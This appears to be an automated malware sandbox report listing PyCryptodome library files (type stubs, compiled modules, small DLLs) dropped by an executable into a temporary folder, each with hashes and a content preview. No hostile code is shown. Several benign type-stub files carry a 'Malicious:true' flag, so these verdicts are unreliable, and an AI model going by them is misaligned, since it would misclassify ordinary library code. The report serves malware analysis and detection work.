                                                                                                                                            Preview:from typing import Union, Optional, Callable..from typing_extensions import Protocol....from Crypto.PublicKey.DSA import DsaKey..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......__all__ = ['new']....class DssSigScheme:.. def __init__(self, key: Union[DsaKey, EccKey], encoding: str, order: int) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .......class DeterministicDsaSigScheme(DssSigScheme):.. def __init__(self, key, encoding, order, private_key) -> None: .......class FipsDsaSigScheme(DssSigScheme):.. def __init__(self, key: DsaKey, encoding: str, order: int, randfunc: Callable) -> None: .......class FipsEcDsaSigScheme(DssSigScheme):.. def __init__(self, key: EccKey, encoding: str, order: int, randfunc: Callable) -> None: .......def new(key: Union[DsaKey, EccKey], mode: str, encoding: Optional[str]='bin

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Signature\PKCS1_PSS.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):895
                                                                                                                                            Entropy (8bit):5.021175970297132
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LtZ3XEDf:Jy+1o3xf1ov2GovRLP3s
                                                                                                                                            MD5:B10C8861416461026424D8341D6B711B
                                                                                                                                            SHA1:9207CD03C8A4F03ADE3FB52D7DD1828E8B734090
                                                                                                                                            SHA-256:2B2FB1983B8866D1CA635CDA145BF4639196A83A0F9B8AA7A6D0F0D39913F8F0
                                                                                                                                            SHA-512:F99F6E29E7980B548D07A760C116964872909158395D158C9199F5E458952AC37EA2D1645E186ED5EB17B570061F60D2A7A903218C9FADE89D61A5FF4562134C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: ...........def new(rsa_key: RsaKey, mgfunc: Optional[MaskFunction]=None, saltLen: Optional[int]=None, randfunc: Optional[RndFunction]=None) -> PSS_SigScheme: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Signature\PKCS1_v1_5.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):467
                                                                                                                                            Entropy (8bit):4.916093935652459
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLtw3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+Ltw3X2
                                                                                                                                            MD5:CA5E82193E428D853927F573B9D0AFFD
                                                                                                                                            SHA1:D1A94E957421405394C4EA31C15A384E3B758978
                                                                                                                                            SHA-256:FCA639E57C49A12AE306A309B29E2D2F49730F65AA23C5FF7DBC031A9EE8D378
                                                                                                                                            SHA-512:EEEDB242B966E71847B03C7CBBC519E77BBCB1DCCD2BE1CEE0BBF2A29B9833F22ACCAD774B7F782D4BF3D3F3EDC7B959117252D2C6C21ABFB1678166BE80AF84
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .........def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Signature\eddsa.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):747
                                                                                                                                            Entropy (8bit):4.991320777959256
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBlRE1BvxS+1dw1z4L556trLuh72tR5A8TTo448/u4Jw1AL1A19YRG98mfvIs:1REOC1++161z4Nfh7IGhI+1mAl9Zfjuk
                                                                                                                                            MD5:F75719D633E9543F8B2191818F5F949E
                                                                                                                                            SHA1:50C2F1E8A90E757A473DDD36FA897EBA33B52786
                                                                                                                                            SHA-256:AB1B0BBE6DF0B563E17CF22EB3DCE37DAC436C836F19A3498647B6A167BC2C45
                                                                                                                                            SHA-512:B5472537D636DB5D8EE6BADEA791816C4E6B052D899AB443D8BC5CB5E4721B1C1B79160F114FEC8A289578566084D3B5C8E7E0385066A331FC9864465BBD0541
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional..from typing_extensions import Protocol..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class XOF(Protocol):.. def read(self, len: int) -> bytes: .......def import_public_key(encoded: bytes) -> EccKey: .....def import_private_key(encoded: bytes) -> EccKey: .......class EdDSASigScheme(object):.... def __init__(self, key: EccKey, context: bytes) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_or_hash: Union[bytes, Hash, XOF]) -> bytes: ..... def verify(self, msg_or_hash: Union[bytes, Hash, XOF], signature: bytes) -> None: .......def new(key: EccKey, mode: str, context: Optional[bytes]=None) -> EdDSASigScheme: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Signature\pkcs1_15.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):581
                                                                                                                                            Entropy (8bit):5.067047688730709
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLRwlbQgA85A3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+LRwlbf
                                                                                                                                            MD5:DC28B90A844CBE3BCE2F14FBAD339B51
                                                                                                                                            SHA1:920E136B27895D970DE44FC61B00180D4DB686F2
                                                                                                                                            SHA-256:E2CE13431A88DD8206D23EF6C0E1935B61795A97166309CA8FBED78D68AF6FED
                                                                                                                                            SHA-512:BC0C4D5F5FD2DB593B00144EB4DDC1BEE12B71CA399CC08C25F00C11B0463404B64FD20F2A13FC91B83ED7DE03E132AA1E968D12373D96E74BFDA0C4CA68A105
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .......def _EMSA_PKCS1_V1_5_ENCODE(msg_hash: Hash, emLen: int, with_hash_parameters: Optional[bool]=True) -> bytes: .......def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Signature\pss.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1071
                                                                                                                                            Entropy (8bit):5.102431129383602
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LAu8Bo633XfD7:Jy+1o3xf1ov2GovRLAVnPf
                                                                                                                                            MD5:505820D514B9F7B2244301F2DC317034
                                                                                                                                            SHA1:A90CFF03252A14134E286EB646ED62D9B82E076D
                                                                                                                                            SHA-256:0A62FC61A9C9A60FDADEFBCF20BCAD59140D16C09E4485A28820F9D14B156ACE
                                                                                                                                            SHA-512:B5A534C52FC07BC8E0A145F628857381F7A8F4570459A83D3DFD4BFB0A6BD526465C1291CB8F2714F5B8A02D12A3403FBEC6B666BE49608B87D3CA80E10D8EC8
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .........MGF1 : MaskFunction..def _EMSA_PSS_ENCODE(mhash: Hash, emBits: int, randFunc: RndFunction, mgf:MaskFunction, sLen: int) -> str: .....def _EMSA_PSS_VERIFY(mhash: Hash, em: str, emBits: int, mgf: MaskFunction, sLen: int) -> None: .....def new(rsa_key: RsaKey, *

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\Counter.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):295
                                                                                                                                            Entropy (8bit):4.705947008789207
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBr0hxrMND0R2D9F6s/2F62LMJteOFr2gCUA2gA1MJFuJry:1REYBr0DI1RFF2FDLMJzZ2gCn2gA1gM4
                                                                                                                                            MD5:48844D3840F12D7CC253481AEB936730
                                                                                                                                            SHA1:2329321B884361FF52CD1E79D4ECD3ABD2C08309
                                                                                                                                            SHA-256:7A86661370C3B894AEB4EDAD8755466DE52226588608A530F63F3E3379585AD0
                                                                                                                                            SHA-512:06990D253057568DB8B16CAFF5599CD48FDE3100B5193213BD250BD1797D11F2A62C00D493AAC5CA60CD557514B3AC543454D9D50991B9EEAA735B3D6E3A7150
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\Padding.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):243
                                                                                                                                            Entropy (8bit):4.823438083026704
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYB0yqDLWJJni6Co6sRGcp5gUeQ/6sRGcp5/:1REYBkDyHZHRGe5VeQPRGe5/
                                                                                                                                            MD5:72AE5A92A5B5373240F3184324E84F6B
                                                                                                                                            SHA1:976AEA0ED87A3C086D068AE560FDB2FFCD591676
                                                                                                                                            SHA-256:ED464B7B39D2481D2C4DE1FF908308ADF7F035B21B3F7A242E469F1BD173DEF6
                                                                                                                                            SHA-512:27C15B7D76E180E1B65D566D8225C3661E78854515C9716A645C5F62E444B5A90AB61DDF92677B9C4A1276921711C281C814CAC60FA6D0BFC76A7716E4124613
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\RFC1751.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):166
                                                                                                                                            Entropy (8bit):4.7074966574817525
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
                                                                                                                                            MD5:0DE296D8A8547E04D6926C50733B2BE8
                                                                                                                                            SHA1:00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
                                                                                                                                            SHA-256:76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
                                                                                                                                            SHA-512:1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1173
                                                                                                                                            Entropy (8bit):4.98010062497697
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:INmlE4ApU2gWfri+RHvEIO4oFaQvuYjVrGivBlg2W2bgg:AmlbASgf++BcD4YaQVprGGBS2Wxg
                                                                                                                                            MD5:34526C666803045C1CB3ED38DF5AFE2B
                                                                                                                                            SHA1:543F889AB3E8F6B255AAFCDDD032AC63E854528D
                                                                                                                                            SHA-256:12CE4EA429FE28858A94A8A9C8D7BDACE868D5A3D1196795D97E4CEC64203FDA
                                                                                                                                            SHA-512:3B071E9583356C828ECBF60C3E0A9D7D9319B8F8252FE43B78A681F2040A369D66D40D9D547195B2B07459AFA7F690B093F55C4ECE2A87576193B6C60D4A9313
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.Z.g.d...Z.d.S.).a[...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Crypto.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Crypto.Util.number` Number-theoretic functions (primality testing, etc.).`Crypto.Util.Counter` Fast counter functions for CTR cipher modes..`Crypto.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Crypto.Util.asn1` Minimal support for ASN.1 DER encoding.`Crypto.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.)...RFC1751..number..strxor..asn1..Counter..PaddingN)...__doc__..__all__..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_cpu_features.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):948
                                                                                                                                            Entropy (8bit):4.772633084811178
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:I/hnLH+UXgAiIFkrOS07Z7Z//2Iph28EZFtSlOWVTdaPOj/3rLT:0pQAiPrOSkpZX2W2Xb/gcPOj/73
                                                                                                                                            MD5:298924C6196DA369C4B12EB38EEDA7C8
                                                                                                                                            SHA1:281A1B7CE9F13EEE12A3114CFE45CDB246E983BC
                                                                                                                                            SHA-256:F3A217DC63A97316B4B8C8D058C1F48901D210AEA81AD283EAE8875B5F4DC401
                                                                                                                                            SHA-512:7D0951B8BD4A0C4F9B1BA50C86FB7419B57068A0DA313899680FBBEEE3721055225662900CDA526295B8D5E76AFD03727EB145CA1E7DD5C4AC404EBCF49FE0E7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................6.....d.d.l.m.Z.....e.d.d...............Z.d...Z.d...Z.d.S.)......)...load_pycryptodome_raw_libz.Crypto.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c.....................4.....t...............................................S...N)..._raw_cpuid_lib..have_aes_ni........mC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\Util\_cpu_features.pyr....r....)...s...........%..%..'..'..'r....c.....................4.....t...............................................S.r....).r......have_clmulr....r....r....r....r....-...s...........$..$..&..&..&r....N)...Crypto.Util._raw_apir....r....r....r....r....r....r......<module>r........s].........>..;..:..:..:..:..:....+..*.+A...,/....0....0......(....(....(....'....'....'....'....'r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_cpu_features.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):4.354688723015057
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:pAQybsRVLSyUkMFjRVLy:OdbsRnORQ
                                                                                                                                            MD5:2318A22B25D0854BD019BAEF901BB42A
                                                                                                                                            SHA1:37E3185DAACB1E611F02805F63044E28779DEFFF
                                                                                                                                            SHA-256:72FD9C4BBFF5954C58E3AE5C421334E7A570E5E8108DCB45499F8B497B359F5E
                                                                                                                                            SHA-512:B38E4BB47DF8EB1D8457D32BA047D2AB5278925854FEF51B8B922C9D0DC092DF19A1BCF9DF1F33CABD79583AC10D289F29A4E5A67B55B886D4282C5404767403
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:def have_aes_ni() -> int: .....def have_clmul() -> int: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_cpuid_c.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10240
                                                                                                                                            Entropy (8bit):4.730605326965181
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
                                                                                                                                            MD5:4D9C33AE53B38A9494B6FBFA3491149E
                                                                                                                                            SHA1:1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
                                                                                                                                            SHA-256:0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
                                                                                                                                            SHA-512:BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_file_system.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1316
                                                                                                                                            Entropy (8bit):5.20264084712239
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:D1Vjobn4Y5J/H0r2HBZ8SlwC8El3OyrPE2W2OHhavkQGovvvE:DHoLrEYZkCreyTE2W/HhOkpovvvE
                                                                                                                                            MD5:ABD9E1FDC477BAEB99043048F0EC851C
                                                                                                                                            SHA1:A8469F15D63DAD61BBAF07E4D04A59D82FF32F5E
                                                                                                                                            SHA-256:37DCD3994BB6B31E615094EFD05BCD35968BD2520F0423CCB09DD9EE06E7E331
                                                                                                                                            SHA-512:D98C26F44229460F144ECE1A3A6A000EE3AA659413BAC75774C8EBB30E28565974A310AD5B5D6F931D2AADF8C05DA917ABEA7A4A20DC2C0E50C5F49456C6280E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.Z.d...Z.d.S.)......Nc.....................d.....|.d...........d.k.....r.t...........d.................t...........|.d.d...........................|.g.z...}.t...........j...............................t...........j...............................t.......................................\...}.}.t...........j...............................|.d...............}.t...........j.........j.........|.g.|...R...S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Crypto"... filename : string. The filename (inclusing extension) in the target directory.. r......Cryptoz)Only available for modules under 'Crypto'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filename..util_lib.._..root_libs.... .lC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-pa

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_file_system.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):103
                                                                                                                                            Entropy (8bit):4.5743153977203175
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
                                                                                                                                            MD5:FFE308959102B5607429CEF941E9560E
                                                                                                                                            SHA1:3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
                                                                                                                                            SHA-256:2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
                                                                                                                                            SHA-512:35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_raw_api.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14318
                                                                                                                                            Entropy (8bit):5.246376378295745
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:3ZiNdoN17fItDTvw/vlEVW5B6UVMmUtmKlTRxKmf9rZTSLI1wEOuPxeDl62i5lPU:JKdoN1zsTvedBB6UGmUvzxHTSowEXxro
                                                                                                                                            MD5:825DE521ED777BFAAE164D806E3D336E
                                                                                                                                            SHA1:ABD957E993F9861A1D184FB64C45BD337EF61203
                                                                                                                                            SHA-256:E11D4A79ADEEA5BCB49E5E36791D48BDA3A934781AA9BA3C3FFA3F27183C52B3
                                                                                                                                            SHA-512:9CC8216770E884DCD38FB9CAE7F83E74329A4302127CA513E15A58AFA48B93EB4AA14264642F78A942C6E145E32E0B37C2EAC76D4682212FD51175D53B0D70C6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e}*........................*.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.........d...........d.k.....r=d.d.l.Z.g.Z...e.j.......................D.]&\...Z.Z.Z.e.e.j.........k.....r.e.......................e..................'n.d.d.l.m.Z...e.j.........Z.e.e.f.Z...G.d...d.e...............Z...d.e.j.........v.r.e.j.........j.........d.k.....r...e.d.................e.j.........d.k.....r.e.j.........d.k.....r...e.d.................d.d.l.m.Z.....e...............Z.e.j ........Z!e.."....................e..#....................d.............................Z$e..#....................d...............j%........j&........Z'd...Z(d...Z)e)Z*e)Z+e)Z,d...Z-d/d...Z.d...Z/d...Z0d...Z1..G.d...d.e...............Z2d...Z3d.Z4n.#.e.$.r...d.d.l5Z5d.d.l5m6Z6m7Z7m8Z8m)Z)m*Z*m-Z-m.Z.m,Z,m+Z+..d.d.l9m:Z:..d.d.l5m;Z'..d.Z!g.Z<d...Z,d ..Z(d!..Z/d"..Z0e5j=........Z>d.Z?e5j@........jA........ZBe5j@........jC........ZDe5jE........ZF..e5jG........e>..............ZH..G.d#..d$e5jI......................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_raw_api.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):933
                                                                                                                                            Entropy (8bit):4.777842095513583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
                                                                                                                                            MD5:577B9FD6612492C13AAD9D5FDC396C43
                                                                                                                                            SHA1:2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
                                                                                                                                            SHA-256:83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
                                                                                                                                            SHA-512:67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_strxor.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10240
                                                                                                                                            Entropy (8bit):4.685843290341897
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
                                                                                                                                            MD5:8F4313755F65509357E281744941BD36
                                                                                                                                            SHA1:2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
                                                                                                                                            SHA-256:70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
                                                                                                                                            SHA-512:FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
                                                                                                                                            Malicious:true
